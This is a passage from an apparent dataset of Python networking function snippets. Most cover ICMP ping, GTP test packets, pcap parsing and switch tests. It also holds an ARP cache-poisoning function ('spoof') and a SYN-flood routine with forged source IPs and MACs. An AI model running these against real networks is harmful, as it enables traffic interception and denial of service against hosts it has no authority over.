order.\n header = struct.pack(\"bbHHh\", ICMP_ECHO_REQUEST, 0, socket.htons(my_checksum), ID, 1)\n packet = header + data\n # my_socket.sendto(packet, (ip, 1)) # getsockaddrarg() takes exactly 2 arguments\n my_socket.sendto(packet, (ip, 80)) # it seems that 0~65535 is OK (port?)", "def gtp_packets(\n self, type='fdir', tunnel_pkt='gtpu', inner_L3='ipv4',\n match_opt='matched', chk='', teid=0xF):\n pkts = []\n pkts_gtpc_pay = {'IPV4/GTPC': 'Ether()/IP()/UDP(%sdport=2123)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPC': 'Ether()/IPv6()/UDP(%sdport=2123)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_pay = {'IPV4/GTPU': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_ipv4 = {'IPV4/GTPU/IPV4': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/FRAG': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP(frag=5)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/UDP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/TCP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/SCTP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV4/ICMP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/ICMP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/FRAG': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP(frag=5)/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/UDP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/TCP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/SCTP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV4/ICMP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IP()/ICMP()/Raw(\"X\"*20)' % (chk, teid)}\n\n pkts_gtpu_ipv6 = {'IPV4/GTPU/IPV6/FRAG': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/IPv6ExtHdrFragment()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/UDP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/TCP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/SCTP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV4/GTPU/IPV6/ICMP': 'Ether()/IP()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6(nh=58)/ICMP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/FRAG': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/IPv6ExtHdrFragment()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/UDP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/UDP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/TCP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/TCP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/SCTP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6()/SCTP()/Raw(\"X\"*20)' % (chk, teid),\n 'IPV6/GTPU/IPV6/ICMP': 'Ether()/IPv6()/UDP(%sdport=2152)/GTP_U_Header(teid=%s)/IPv6(nh=58)/ICMP()/Raw(\"X\"*20)' % (chk, teid)}\n\n if match_opt == 'matched':\n if tunnel_pkt is 'gtpc' and inner_L3 is None:\n pkts = pkts_gtpc_pay\n if tunnel_pkt is 'gtpu' and inner_L3 is None:\n pkts = pkts_gtpu_pay\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv4':\n pkts = pkts_gtpu_ipv4\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv6':\n pkts = pkts_gtpu_ipv6\n\n if match_opt == 'not matched':\n if type is 'fdir':\n if tunnel_pkt is 'gtpc' and inner_L3 is None:\n pkts = dict(\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is None:\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv4':\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu' and inner_L3 is 'ipv6':\n pkts = dict(\n pkts_gtpc_pay.items() +\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items())\n if type is 'clfter':\n if tunnel_pkt is 'gtpc':\n pkts = dict(\n pkts_gtpu_pay.items() +\n pkts_gtpu_ipv4.items() +\n pkts_gtpu_ipv6.items())\n if tunnel_pkt is 'gtpu':\n pkts = pkts_gtpc_pay\n return pkts", "def hmVerifyMsgCRCOK(destination, protocol, source, expectedFunction, expectedLength, datal) :\r\n badresponse = 0\r\n if protocol == constants.HMV3_ID:\r\n checksum = datal[len(datal)-2:]\r\n rxmsg = datal[:len(datal)-2]\r\n crc = crc16() # Initialises the CRC\r\n expectedchecksum = crc.run(rxmsg)\r\n if expectedchecksum == checksum:\r\n print(\"CRC is correct\")\r\n else:\r\n print(\"CRC is INCORRECT\")\r\n s = \"Incorrect CRC: %s Expected: %s \\n\" % (datal, expectedchecksum)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n # Check the response\r\n dest_addr = datal[0]\r\n frame_len_l = datal[1]\r\n frame_len_h = datal[2]\r\n frame_len = (frame_len_h << 8) | frame_len_l\r\n source_addr = datal[3]\r\n func_code = datal[4]\r\n\r\n\r\n\r\n if (dest_addr != 129 and dest_addr != 160):\r\n print(\"dest_addr is ILLEGAL\")\r\n s = \"%s : Controller %s : Illegal Dest Addr: %s\\n\" % (localtime, loop, dest_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (dest_addr != destination):\r\n print(\"dest_addr is INCORRECT\")\r\n s = \"%s : Controller %s : Incorrect Dest Addr: %s\\n\" % (localtime, loop, dest_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (source_addr < 1 or source_addr > 32):\r\n print(\"source_addr is ILLEGAL\")\r\n s = \"%s : Controller %s : Illegal Src Addr: %s\\n\" % (localtime, loop, source_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (source_addr != source):\r\n print(\"source addr is INCORRECT\")\r\n s = \"%s : Controller %s : Incorrect Src Addr: %s\\n\" % (localtime, loop, source_addr)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (func_code != constants.FUNC_WRITE and func_code != constants.FUNC_READ):\r\n print(\"Func Code is UNKNWON\")\r\n s = \"%s : Controller %s : Unknown Func Code: %s\\n\" % (localtime, loop, func_code)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (func_code != expectedFunction):\r\n print(\"Func Code is UNEXPECTED\")\r\n s = \"%s : Controller %s : Unexpected Func Code: %s\\n\" % (localtime, loop, func_code)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (func_code == constants.FUNC_WRITE and frame_len != 7):\r\n # Reply to Write is always 7 long\r\n print(\"response length is INCORRECT\")\r\n s = \"%s : Controller %s : Incorrect length: %s\\n\" % (localtime, loop, frame_len)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n if (len(datal) != frame_len):\r\n print(\"response length MISMATCHES header\")\r\n s = \"%s : Controller %s : Mismatch length: %s %s\\n\" % (localtime, loop, len(datal), frame_len)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\r\n \"\"\"if (func_code == constants.FUNC_READ and expectedLength !=len(datal) ):\r\n # Read response length is wrong\r\n print(\"response length not EXPECTED value\")\r\n print(len(datal))\r\n print(datal)\r\n s = \"%s : Controller %s : Incorrect length: %s\\n\" % (localtime, loop, frame_len)\r\n sys.stderr.write(s)\r\n badresponse += 1\r\n\"\"\"\r\n if (badresponse == 0):\r\n return True\r\n else:\r\n return False\r\n\r\n else:\r\n assert 0, \"Un-supported protocol found %s\" % protocol", "def parse_packets(pcap):\n # For each packet in the pcap process the contents\n flow_Info = []\n times = 0\n for timestamp, buf in pcap:\n times += 1\n tmp_flow_Info = {}\n\n # Unpack the Ethernet frame (mac src/dst, ethertype)\n eth = dpkt.ethernet.Ethernet(buf)\n # Unpack the data whthin the Ethernet frame (the IP packet)\n ip = eth.data\n\n # if protocol(ip.p) is not UDP(17) ,skip this packet\n if ip.p != 17:\n continue\n\n udp = ip.data\n # Temp_data = parse_data(eth.data.udp.data)\n # Filter CoAP by port\n if(udp.sport != 5683 or udp.dport != 5683):\n continue\n\n str_udp_data = parse_data(eth.data.udp.data)\n # skip packets of Non_confirmable\n if str_udp_data[0] == '5': \n continue\n\n cycle = 0\n index = 0\n Udp_data = []\n \n len_str_udp_data = len(str_udp_data)\n while cycle < (len_str_udp_data//3+1):\n # Udp_data.append(int('0x'+Str_Udp_data[index:index + 2], 16))\n Udp_data.append(int('0x' + str_udp_data[index:index + 2], 16))\n cycle += 1\n index += 3\n tmp_flow_Info['udp_data'] = (Udp_data)\n\n # confirmable or ack\n tmp_flow_Info['Coap_type'] = str_udp_data[0]\n #print(str_udp_data) \n \n # skip space and get \"Message ID\" \n HexMide = str_udp_data[6:8] + str_udp_data[9:11]\n tmp_flow_Info['Mid'] = int('0x'+HexMide, 16)\n\n tmp_flow_Info['Timestamp'] = str(datetime.datetime.fromtimestamp(timestamp))\n # print('Ethernet Frame: ', mac_addr(eth.src), mac_addr(eth.dst), eth.type)\n tmp_flow_Info['src'] = inet_to_str(ip.src)\n tmp_flow_Info['dst'] = inet_to_str(ip.dst)\n\n tmp_flow_Info['sport'] = udp.sport\n tmp_flow_Info['dport'] = udp.dport\n flow_Info.append(tmp_flow_Info)\n\n return flow_Info", "def scapy_create_send_ARP(self, ipdst):\n ether_header = self.define_ethernet_header()\n arp_header = self.define_arp_header(pdst=ipdst)\n sendp(ether_header/arp_header, count = DEFAULT_PACKET_DURATION,\\\n iface=self.sourceiface)", "def aprs_msg(src,dst,via,addr,msgtext):\n\n to = addr.ljust(9)[:9]\n msg = src + '>' + dst\n if via:\n msg += ',' + via\n msg += '::' + to + ':' + msgtext\n return msg", "def send_one_ping(self, current_socket):\n from struct import pack\n from sys import byteorder\n\n def calculate_checksum(source_string):\n \"\"\"A port of the functionality of in_cksum() from ping.c\n Ideally this would act on the string as a series of 16-bit ints (host\n packed), but this works.\n Network data is big-endian, hosts are typically little-endian\n \"\"\"\n countTo = (int(len(source_string) / 2)) * 2\n sum = 0\n count = 0\n\n # Handle bytes in pairs (decoding as short ints)\n loByte = 0\n hiByte = 0\n while count < countTo:\n if (byteorder == \"little\"):\n loByte = source_string[count]\n hiByte = source_string[count + 1]\n else:\n loByte = source_string[count + 1]\n hiByte = source_string[count]\n sum = sum + (ord(hiByte) * 256 + ord(loByte))\n count += 2\n\n # Handle last byte if applicable (odd-number of bytes)\n # Endianness should be irrelevant in this case\n if countTo < len(source_string): # Check for odd length\n loByte = source_string[len(source_string) - 1]\n sum += ord(loByte)\n\n sum &= 0xffffffff # Truncate sum to 32 bits (a variance from ping.c, which\n # uses signed ints, but overflow is unlikely in ping)\n\n sum = (sum >> 16) + (sum & 0xffff) # Add high 16 bits to low 16 bits\n sum += (sum >> 16) # Add carry from above (if any)\n answer = ~sum & 0xffff # Invert and truncate to 16 bits\n answer = socket.htons(answer)\n\n return answer\n\n ICMP_ECHO = 8 # Echo request (per RFC792)\n\n # Header is type (8), code (8), checksum (16), id (16), sequence (16)\n checksum = 0\n\n # Make a dummy header with a 0 checksum.\n header = pack(\n \"!BBHHH\", ICMP_ECHO, 0, checksum, self.own_id, self.seq_number\n )\n\n padBytes = []\n startVal = 0x42\n for i in range(startVal, startVal + (self.packet_size)):\n padBytes += [(i & 0xff)] # Keep chars in the 0-255 range\n data = bytes(padBytes)\n\n # Calculate the checksum on the data and the dummy header.\n checksum = calculate_checksum(header + data) # Checksum is in network order\n\n # Now that we have the right checksum, we put that in. It's just easier\n # to make up a new header than to stuff it into the dummy.\n header = pack(\n \"!BBHHH\", ICMP_ECHO, 0, checksum, self.own_id, self.seq_number\n )\n\n packet = header + data\n\n send_time = self.timer()\n\n try:\n current_socket.sendto(packet, (self.destination, 1)) # Port number is irrelevant for ICMP\n except socket.error as e:\n current_socket.close()\n return\n\n return send_time", "def check_ip_fwd(duthosts, all_cfg_facts, nbrhosts, tbinfo):\n for porttype in [\"ethernet\", \"portchannel\"]:\n for version in [4, 6]:\n\n ports = pick_ports(duthosts, all_cfg_facts, nbrhosts, tbinfo, port_type_a=porttype, version=version)\n\n for ttl, size in [(2, 64), (1, 1450)]:\n # local interfaces\n check_packet(sonic_ping, ports, 'portB', 'portA', size=size, ttl=ttl, ttl_change=0)\n\n # local neighbors\n check_packet(sonic_ping, ports, 'portA', 'portA',\n dst_ip_fld='nbr_ip', size=size, ttl=ttl, ttl_change=0)\n\n vm_host_to_A = nbrhosts[ports['portA']['nbr_vm']]['host']\n\n check_packet(eos_ping, ports, 'portD', 'portA', dst_ip_fld='my_lb4096_ip', src_ip_fld='nbr_lb',\n dev=vm_host_to_A, size=size, ttl=ttl)\n\n # loopbacks\n check_packet(sonic_ping, ports, 'portA', 'portA', dst_ip_fld='nbr_lb', size=size, ttl=ttl, ttl_change=0)\n\n # inband\n check_packet(sonic_ping, ports, 'portA', 'portA', src_ip_fld='inband', size=size, ttl=ttl, ttl_change=0)\n\n # DUT loopback\n # these don't decrement ttl\n check_packet(sonic_ping, ports, 'portA', 'portA', src_ip_fld='my_lb_ip', dst_ip_fld='my_ip', size=size,\n ttl=ttl, ttl_change=0)\n check_packet(sonic_ping, ports, 'portA', 'portA', src_ip_fld='my_lb_ip', dst_ip_fld='nbr_ip', size=size,\n ttl=ttl, ttl_change=0)\n check_packet(sonic_ping, ports, 'portA', 'portA', src_ip_fld='my_lb_ip', dst_ip_fld='nbr_lb', size=size,\n ttl=ttl, ttl_change=0)\n\n vm_host_to_A = nbrhosts[ports['portA']['nbr_vm']]['host']\n check_packet(eos_ping, ports, 'portA', 'portA', dst_ip_fld='my_lb4096_ip', src_ip_fld='nbr_lb',\n dev=vm_host_to_A, size=size, ttl=ttl, ttl_change=0)\n\n # end to end\n vm_host_to_A = nbrhosts[ports['portA']['nbr_vm']]['host']\n check_packet(eos_ping, ports, 'portB', 'portA', dst_ip_fld='nbr_lb', src_ip_fld='nbr_lb',\n dev=vm_host_to_A, size=size, ttl=ttl)\n check_packet(eos_ping, ports, 'portC', 'portA', dst_ip_fld='nbr_lb', src_ip_fld='nbr_lb',\n dev=vm_host_to_A, size=size, ttl=ttl)\n check_packet(eos_ping, ports, 'portD', 'portA', dst_ip_fld='nbr_lb', src_ip_fld='nbr_lb',\n dev=vm_host_to_A, size=size, ttl=ttl)", "def translate_control_packet(self, multicast_packet):", "def send_packets_to_IPv4_targets_customized(self):\n pktcount = self.pktcount\n # If user does not specify pktcount, need calculate it based on\n # duration and interval\n if (pktcount == 0):\n pktcount = int(self.duration*1000/self.interval)\n\n # If destmac not specified, then use default value\n # If source_address is a range, then calculate source mac based on IP\n\n dest_array = self.destination_address.split('-')\n start = dest_array[0]\n end = start\n if (len(dest_array) > 1):\n end = dest_array[1]\n print(\"Send %s packets to %s from source %s\" % (self.protocol, \\\n self.destination_address, self.source_address))\n\n source_array = self.source_address.split('-')\n sstartip = source_array[0]\n sendip = sstartip\n if (len(source_array) > 1):\n sendip = source_array[1]\n for sip in range(ip2long(sstartip), ip2long(sendip)+1):\n sourceip = long2ip(sip)\n sourcemac = None\n if (len(source_array) > 1):\n sourcemac = gen_mac(sourceip)\n else:\n sourcemac = self.sourcemac\n destmac = self.destmac\n for count in range(0, pktcount):\n for i in range (ip2long(start), ip2long(end)+1):\n current_dest = long2ip(i)\n if self.protocol == \"icmp\":\n self.scapy_create_send_ICMP_customized(current_dest,\\\n sourceip, True, destmac, sourcemac)\n elif self.protocol == \"arp\":\n self.scapy_create_send_ARP_customized(current_dest,\\\n sourceip, sourcemac)\n elif self.protocol in ['tcp', 'udp']:\n self.scapy_create_send_layer4(current_dest, sourceip, \\\n self.protocol, destmac, sourcemac, self.payload)\n # Sleep between sending packets\n time.sleep(self.interval/1000.0)", "def compute_tcp_acks_retrans(pcap_filepath, connections, inverse_conns, ts_syn_timeout=6.0, ts_timeout=3600.0):\n print(\"Computing TCP ack sizes for\", pcap_filepath)\n nb_acks = {co.C2S: {}, co.S2C: {}}\n acks = {}\n # Avoid processing packets that do not belong to any analyzed TCP connection\n black_list = set()\n pcap_file = open(pcap_filepath)\n pcap = dpkt.pcap.Reader(pcap_file)\n count = 0\n try:\n for ts, buf in pcap:\n ts_delta = get_ts_delta(ts)\n count += 1\n if count % 100000 == 0:\n print(count)\n # Check if linux cooked capture\n if pcap.datalink() == dpkt.pcap.DLT_LINUX_SLL:\n eth = dpkt.sll.SLL(buf)\n else:\n eth = dpkt.ethernet.Ethernet(buf)\n if type(eth.data) == dpkt.ip.IP or type(eth.data) == dpkt.ip6.IP6:\n ip = eth.data\n if type(ip.data) == dpkt.tcp.TCP:\n tcp = ip.data\n fin_flag = (tcp.flags & dpkt.tcp.TH_FIN) != 0\n syn_flag = (tcp.flags & dpkt.tcp.TH_SYN) != 0\n rst_flag = (tcp.flags & dpkt.tcp.TH_RST) != 0\n ack_flag = (tcp.flags & dpkt.tcp.TH_ACK) != 0\n\n saddr, daddr, sport, dport = get_ips_and_ports(eth, ip, tcp)\n if syn_flag and not ack_flag and not fin_flag and not rst_flag:\n process_first_syn(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, black_list, inverse_conns,\n ts_syn_timeout, ts_timeout)\n\n elif (saddr, sport, daddr, dport) in black_list:\n continue\n\n elif syn_flag and ack_flag and not fin_flag and not rst_flag:\n process_syn_ack(ts_delta, acks, nb_acks, connections, tcp, saddr, ip, daddr, sport, dport, black_list, inverse_conns,\n ts_syn_timeout, ts_timeout)\n\n elif not syn_flag and not rst_flag and ack_flag:\n if (saddr, sport, daddr, dport) in acks:\n process_pkt_from_client(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag)\n\n elif (daddr, dport, saddr, sport) in acks:\n process_pkt_from_server(ts_delta, acks, nb_acks, connections, tcp, ip, saddr, daddr, sport, dport, fin_flag)\n else:\n # Silently ignore those packets\n # print(saddr, sport, daddr, dport, \"haven't seen beginning...\")\n continue\n\n except dpkt.NeedData as e:\n print(e, \": trying to continue...\", file=sys.stderr)\n finally:\n pcap_file.close()\n\n return nb_acks", "def receive_ping(my_socket, ID, timeout):\n start_time = timeout\n while True:\n start_select = time.clock()\n # select.select(rlist, wlist, xlist[, timeout])\n # wait until ready for read / write / exceptional condition\n # The return value is a triple of lists\n what_ready = select.select([my_socket], [], [], start_time)\n how_long = (time.clock() - start_select)\n if what_ready[0] == []: #timeout\n return\n\n time_received = time.clock()\n # socket.recvfrom(bufsize[, flags])\n # The return value is a pair (string, address)\n rec_packet, addr = my_socket.recvfrom(1024)\n icmp_header = rec_packet[20 : 28]\n ip_type, code, checksum, packet_ID, sequence = struct.unpack(\"bbHHh\", icmp_header)\n if ip_type != 8 and packet_ID == ID: # ip_type should be 0\n byte_in_double = struct.calcsize(\"d\")\n time_sent = struct.unpack(\"d\", rec_packet[28 : 28 + byte_in_double])[0]\n return time_received - time_sent\n\n start_time = start_time - how_long\n if start_time <= 0:\n return", "def spoof(target_ip, spoof_ip):\n arp_answer = scapy.ARP(\n op=2,\n pdst=target_ip,\n hwdst=get_mac(target_ip),\n psrc=spoof_ip\n )\n scapy.send(arp_answer, verbose=False)", "def handle_icmp(pkt, packets, i, start_point):\r\n icmp_type = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_code = int(pkt[start_point:start_point+2], 16)\r\n start_point = start_point + 2\r\n icmp_checksum = pkt[start_point:start_point+4]\r\n packets[i][2].append(icmp_type)\r\n packets[i][2].append(icmp_code)\r\n packets[i][2].append(icmp_checksum)\r\n return packets", "def icmp_ping(ip_addr, timeout = 6, count = 1024):\n for i in range(count):\n print('Ping wait:')\n try:\n delay = ping_wait(ip_addr, timeout)\n except socket.gaierror as e:\n print('Failed. (socket error: %s)' % e[1])\n break\n\n if delay == None:\n print('Failed. (timeout within %s second.)' % timeout)\n else:\n print('get ICMP in %0.4f ms' % (delay * 1000))", "def parse_ICMP_Echo(timestamp, packet):\n eth = dpkt.ethernet.Ethernet(packet)\n\n # Make sure IPv4 is next protocol\n if isinstance(eth.data, dpkt.ip.IP):\n ip = eth.data\n # Make sure ICMP is next protocol\n if isinstance(ip.data, dpkt.icmp.ICMP):\n icmp = ip.data\n # Make sure ICMP Echo is payload\n if isinstance(icmp.data, dpkt.icmp.ICMP.Echo):\n echo = icmp.data\n\n if icmp.type == dpkt.icmp.ICMP_ECHO:\n echo_type_str = 'request'\n elif icmp.type == dpkt.icmp.ICMP_ECHOREPLY:\n echo_type_str = 'reply'\n else:\n return False\n\n ip_src = socket.inet_ntoa(ip.src)\n ip_dst = socket.inet_ntoa(ip.dst)\n\n print('{:.6f} '.format(timestamp), end='')\n print('{} > {}: '.format(ip_src, ip_dst), end='')\n print('ICMP echo {}, id {}, seq {}, length {}'\n .format(echo_type_str, echo.id, echo.seq, len(echo.data)))\n return True\n\n return False", "def sniff_online(args):\n print('viewer: listening on ' + args.interface)\n\n try:\n sniffer = pcapy.open_live(args.interface, 65536, 1, 1)\n sniffer.setfilter('icmp')\n except Exception as e:\n print(e)\n sys.exit(-1)\n\n if not args.count:\n count = True\n else:\n count = args.count\n\n while count:\n (header, packet) = sniffer.next()\n if header:\n tts = header.getts()\n ret = parse_ICMP_Echo(tts[0] + tts[1] / 1000000, packet)\n\n if ret and args.count:\n count -= 1", "def send_packet(self, src_packet, dest, N):\n\t\t# return a delay time\n\n\t\tnumHops = src_packet.src - dest\n\t\tif numHops < 0:\n\t\t\tnumHops = N - abs(numHops)\n\t\treturn numHops * 10e-5", "def icmp_ping(ip_addr, timeout=0.5, count=4):\n is_connect = 1\n\n for i in range(count):\n try:\n delay = ping_once(ip_addr, timeout)\n except socket.gaierror, e:\n print \"failed. (socket error: '%s')\" % e[1]\n if delay == None:\n print 'failed. (timeout within %s second.)' % timeout\n is_connect = 0\n else:\n pass\n result = [ip_addr, round(delay, 4), is_connect]\n return result", "def ping(dst, count = 10, timeout = 30):\t\n\tpingTimes = []\n\tlogging.debug(\"ping %s (%i times)\", dst, count)\n\tcommand = Command(['ping', '-n', '-c', str(count), dst], timeout)\n\tcommand.run()\n\t# when it's executing here, the results have been available\n\tif command.out is not None:\n\t\tpattern = \"time=([0-9]+\\.[0-9]+) ms\"\n\t\tlines = command.out.split('\\n')\n\t\tfor line in lines:\n\t\t\tpingTime = re.search(pattern, line)\n\t\t\ttry:\n\t\t\t\tpingTimes.append(float(pingTime.group(1)))\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\treturn command.returncode, pingTimes", "def on_ctcp(self, raw_msg, source, msg, **kwargs):", "def verbose_ping(dest_addr, timeout = 2, count = 4):\n for i in range(count):\n logging.info(\"%s: ping %s...\" % (i, dest_addr))\n try:\n delay = do_one(dest_addr, timeout)\n except socket.gaierror as e:\n logging.error(\"failed. (socket error: '%s')\" % (e[1]))\n break\n\n if delay == None:\n logging.error(\"failed. (timeout within %ssec.)\" % (timeout))\n else:\n delay = delay * 1000\n logging.info(\"get ping in %0.4fms\" % (delay))\n logging.info('')", "def cmd_tcp_synflood(ip, interface, count, port, forgemac, forgeip, verbose):\n\n conf.verb = False\n\n if interface:\n conf.iface = interface\n\n layer2 = Ether()\n\n layer3 = IP()\n layer3.dst = ip\n\n layer4 = TCP()\n layer4.dport = port\n\n pkt = layer2 / layer3 / layer4\n\n counter = 0\n\n print(\"Please, remember to block your RST responses\", file=sys.stderr)\n\n while True:\n if forgeip:\n pkt[IP].src = \"%s.%s\" %(pkt[IP].src.rsplit('.', maxsplit=1)[0], randint(1, 254))\n if forgemac:\n pkt[Ether].src = RandMAC()\n\n pkt[TCP].sport = randint(10000, 65000)\n\n if verbose:\n print(pkt.summary())\n else:\n print('.', end='')\n sys.stdout.flush()\n\n sendp(pkt)\n counter += 1\n\n if count != 0 and counter == count:\n break\n\n return True", "def test_packet_handler_arp_reply_new_ip(self):\n packet = Ether() / ARP(op='is-at')\n arp = packet[ARP]\n\n chef = ARPChef()\n\n # Configure the ip_mac struct to think it's already seen the source.\n chef.ip_mac = {\n arp.psrc: 'old_ip',\n }\n\n dumpling = chef.packet_handler(packet)\n\n # We should have updated the ip_mac structure with the new ip address.\n assert chef.ip_mac[arp.psrc] == arp.hwsrc\n\n # Check dumpling payload, including 'notes'.\n assert dumpling == {\n 'operation': 'reply',\n 'src_hw': arp.hwsrc,\n 'src_ip': arp.psrc,\n 'dst_hw': arp.hwdst,\n 'dst_ip': arp.pdst,\n 'time': arp.time,\n 'notes': 'source device has new IP address',\n }", "def verify_tunnel_established(self, src_host, dst_host, other_host, packets=3):\n icmp_match = {'eth_type': IPV4_ETH, 'ip_proto': 1}\n self.wait_until_matching_flow(icmp_match, table_id=self._PORT_ACL_TABLE, ofa_match=False)\n tcpdump_text = self.tcpdump_helper(\n dst_host, 'icmp[icmptype] == 8', [\n # need to set static ARP as only ICMP is tunnelled.\n lambda: src_host.cmd('arp -s %s %s' % (other_host.IP(), other_host.MAC())),\n lambda: src_host.cmd('ping -c%u -t1 %s' % (packets, other_host.IP()))\n ],\n packets=1, timeout=(packets + 1),\n )\n self.wait_nonzero_packet_count_flow(\n icmp_match, table_id=self._PORT_ACL_TABLE, ofa_match=False)\n self.assertTrue(re.search(\n '%s: ICMP echo request' % other_host.IP(), tcpdump_text\n ), 'Tunnel was not established')", "def traff_from_extgwrtr(extgwrtr_ip, fipsOftargetVMs, proto='all', jumbo=0):\n traff = gbpFabTraff()\n print 'FIPs of Target VMs == %s' % (fipsOftargetVMs)\n # List of FIPs ExtGWRtr will ping, ping_fips should be type List\n if isinstance(fipsOftargetVMs,dict):\n ping_fips = fipsOftargetVMs.values() \n if isinstance(fipsOftargetVMs,list):\n ping_fips = fipsOftargetVMs\n if not isinstance(fipsOftargetVMs,list):\n ping_fips = [fipsOftargetVMs]\n attemptall = 1\n if proto == 'all':\n while attemptall < max_traff_attempts:\n if jumbo == 1:\n results_icmp = traff.test_regular_icmp(\n extgwrtr_ip, ping_fips, pkt_size='9000')\n else:\n results_icmp = traff.test_regular_icmp(extgwrtr_ip, ping_fips)\n results_tcp = traff.test_regular_tcp(extgwrtr_ip, ping_fips)\n if results_icmp != 1 and results_tcp != 1:\n retval = {'ICMP': results_icmp.keys(), 'TCP': results_tcp.keys()}\n elif results_icmp != 1:\n retval = {'ICMP': results_icmp.keys()}\n elif results_tcp != 1:\n retval = {'TCP': results_tcp.keys()}\n else:\n return 1\n if isinstance(retval,dict):\n print \"Wait for 10 secs before the next ICMP & TCP retry\\n\"\n sleep(10)\n attemptall += 1\n return retval\n if proto == 'icmp':\n if jumbo == 1:\n results_icmp = traff.test_regular_icmp(\n extgwrtr_ip, ping_fips, pkt_size='9000')\n else:\n results_icmp = traff.test_regular_icmp(extgwrtr_ip, ping_fips)\n attempt = 1\n while attempt < 